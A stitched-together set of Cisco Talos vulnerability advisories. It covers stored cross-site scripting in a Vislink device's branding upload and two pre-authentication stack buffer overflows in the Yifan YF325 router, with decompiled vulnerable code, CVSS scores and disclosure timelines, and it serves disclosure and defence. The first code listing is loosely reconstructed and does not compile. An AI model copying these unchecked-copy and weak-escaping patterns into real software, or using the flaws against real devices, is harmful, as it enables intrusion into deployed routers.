    
    int handle_brand_upload()
    {
        // [1] Extract the attacker-controlled parameters
        char* brand_web_name = cgi_safe_param("brand_web_name");
        char* brand_product_name = cgi_safe_param("brand_product_name");
        char* brand_web_name = cgi_safe_param("brand_web_title");
        char* brand_product_name = cgi_safe_param("brand_web_link_text");
        char* brand_web_name = cgi_safe_param("brand_web_link_url");
    
        char brand_tmp_filepath[] = "/tmp/__upload_brand_conf.XXXXXX";
        int fd;
    
        char cmd[0x400] = {0};
    
        // [2] Check only the supplied `brand_web_name` against a short list of 'dangerous' inputs
        for (int i = 0; i < NUM_BLOCKLIST; i++)
        {
            if strcasestr(brand_web_name, global_blocklist[i])
            {
                xml_error("Request rejected due to prohibited value in brand_web_name.");
                return 0;
            }
        }
    
        // [3] Store the attacker-controlled parameters into a new taglist
        taglist_t* brand_tags = create_taglist();
        update_taglist_ex(brand_tags, scrub_newlines(brand_product_name), "PRODUCT_NAME");
        update_taglist_ex(brand_tags, scrub_newlines(brand_web_title), "WEB_TITLE");
        update_taglist_ex(brand_tags, scrub_newlines(brand_web_name), "WEB_NAME");
        update_taglist_ex(brand_tags, scrub_newlines(brand_web_link_text), "WEB_LINK_STRING");
        update_taglist_ex(brand_tags, scrub_newlines(brand_web_link_url), "WEB_LINK_URL");
    
        fd = mkstemp(&brand_tmp_filepath);
        if (fd == -1) {
            xml_error("Internal error, please try again later.");
            return 0;
        }
        close(fd);
    
        // [4] Store the tags to a temporary file
        save_taglist_ex(brand_tags, &brand_tmp_filepath, 1);
    
        // [5] Persist the data into /etc/brand.conf
        snprintf(&cmd, 0x400, "/usr/local/ilink/bin/persistent_data_utils brand -a save -f %s >/dev/null 2>&1", &brand_tmp_filepath);
        int result = system(&cmd);
        unlink(&brand_tmp_filepath);
    
        if (result != 0) {
            xml_error("Unable to save, please try again later.");
            return 0;
        }
    
        return 1;
    }
    

Upon receiving a properly formed HTTP request, and validating that the OEM of the device is VISLINK, handle_brand_upload is called. Within this function, the attacker-controlled POST parameters of the request are extracted ([1]), and brand_web_name specifically is checked against a blocklist to ensure that none of six prohibited values are contained within the submitted value at [2]. If brand_web_name passes these checks, then the values are persisted to the device’s configuration files.

It is not necessary to know the full implementation details for the “taglist” structure except to say that values put into a taglist via update_taglist_ex ([3]), saved via save_taglist_ex ([4]) and persisted into the brand configuration file through persistent_data_utils ([5]), will be made available to any software on the system.

These particular values are used to populate the branding for the web interface, and they’re placed into the HTML within the index.cgi binary in a function named load_leftmenu. This function is located at offset 0x40a6a4 and the relevant portion of a decompilation of the function is included below.

    void load_leftmenu(int menu_type)
    {
        char* html_data;
    
        switch(menu_type)
        {
            case MAIN:
                // [6] Recover the attacker-controlled branding from /etc/brand.
                taglist_t brand_tags = load_taglist_ex("/etc/brand.conf", 1, 0);
                char* web_name = get_taglist_default_ex(brand_tags, "", "WEB_NAME");
                char* web_link_string = get_taglist_default_ex(brand_tags, "", "WEB_LINK_STRING");
                char* web_link_url = get_taglist_default_ex(brand_tags, "", "WEB_LINK_URL");
    
                // [7] Read the template file and replace the templated data with the brand data
                html_data = readfile("html/leftmenu_main.html");
                html_data = replace(html_data, "{PROGRAM_NAME}", __javascript_escape(web_name));
                html_data = replace(html_data, "{OEL_NAME}" , __javascript_escape(web_link_string));
                html_data = replace(html_data, "{OEL_URL}", __javascript_escape(web_link_url));
                free_taglist(brand_tags);
                break;
    
            ...
        }
    
        puts(html_data);
        free(html_data);
        return;
    }
    

At [6], the branding taglist is loaded from /etc/brand.conf and three of the branding tags are loaded. Then, at [7], the HTML template for the menu is loaded from disk, and the branding data is used to populate the templated values. While the branding data is passed through __javascript_escape prior to being injected into the template, the escaping implemented in this function simply prefixes dangerous characters with a backslash with no HTML-specific escaping. However, this escaping does limit this vulnerability to just brand_web_name and web_link_url, due to the way in which the template is written. The template file, leftmenu_main.html, almost entirely consists of jQuery-heavy javascript, and this script is responsible for updating the DOM with the provided branding. Some of these parameters are injected into the template within locations in jQuery code that will not treat the input as an htmlString, and the __javascript_escape prevents an attacker from escaping into the <script> itself. In this instance, only brand_web_name and web_link_url will be transformed into HTML elements that can be manipulated into executing javascript.

**TIMELINE**

2023-06-26 - Initial Vendor Contact  
2023-06-27 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Matt Wiseman of Cisco Talos.

CVE-2023-34354: TALOS-2023-1781 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd gwcfg.cgi get functionality of Yifan YF325 v1.0_20221108. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd gwcfg.cgi get functionality of Yifan YF325 v1.0\_20221108. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-489 - Leftover Debug Code

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs. The API that manages the gwcfg.cgi/get* endpoints uses a specific function to parse the incoming data; this API is probably a left over debug code. This API uses the httpd’s gwcfg_cgi_get_manage_post_data function to parse the incoming data:

    void gwcfg_cgi_get_manage_post_data(undefined4 URL_path,undefined4 client_FD,undefined4 content_length)
    
    {
      [...]
    
      memset(post_data,0,0x400);
      APP_TRACE("do_get_cfg_post url:%s,len:%d\n",URL_path,content_length);
      abc_var = websGetVar(client_FD,"abc","0");
      if (abc_var != 0) {
        APP_TRACE("abc:%s\n",abc_var);
      }
      read_n = wfread(post_data,1,content_length,client_FD);                                                        [1]
      APP_TRACE("wfread ret:%d\n",read_n);
      APP_TRACE("do_get_cfg_post buf:%s\n",post_data);
      return;
    }
    

The function reads, at [1], the data of the request using the provided Content-Length. Because the content length is not checked against the length of the post_data static buffer, there is a stack-base buffer overflow at [1]. This function is reachable prior to authentication.

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-34346: TALOS-2023-1764 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in the httpd do_wds functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to stack-based buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A stack-based buffer overflow vulnerability exists in the httpd do\_wds functionality of Yifan YF325 v1.0\_20221108. A specially crafted network request can lead to stack-based buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Yifan YF325 v1.0\_20221108

**PRODUCT URLS**

YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html

**CVSSv3 SCORE**

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**DETAILS**

The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.

The YF325 router provides a series of APIs. The API that manages the Wireless_WDS* endpoints uses the httpd’s do_wds function:

    void do_wds(undefined4 param_1,char* URL_path,undefined4 fd)
    {
        [...]
        dash_in_URL = indexof(URL_path,L'-');                                                                       [1]
        strcpy(filename,URL_path + dash_in_URL + 1);                                                                [2]
        [...]
    } The `URL_path` parameter is the request's URL path without the leading slash. This function takes, at `[1]`, the index of the first `-` in `URL_path`; if there is no such character, the function `indexof` will return -1. At `[2]` the result of the `indexof` function is used to copy either the whole `URL_path` string if no `-` is present, or only the string after the `-` if it is. The string is copied into a static buffer. Because the function used to copy the string is `strcpy` and no check is performed on the length of what is copied, the `do_wds` function is vulnerable to a stack-based buffer overflow. This vulnerability can be reached without authentication.
    

**TIMELINE**

2023-06-28 - Initial Vendor Contact  
2023-07-06 - Vendor Disclosure  
2023-10-11 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#auth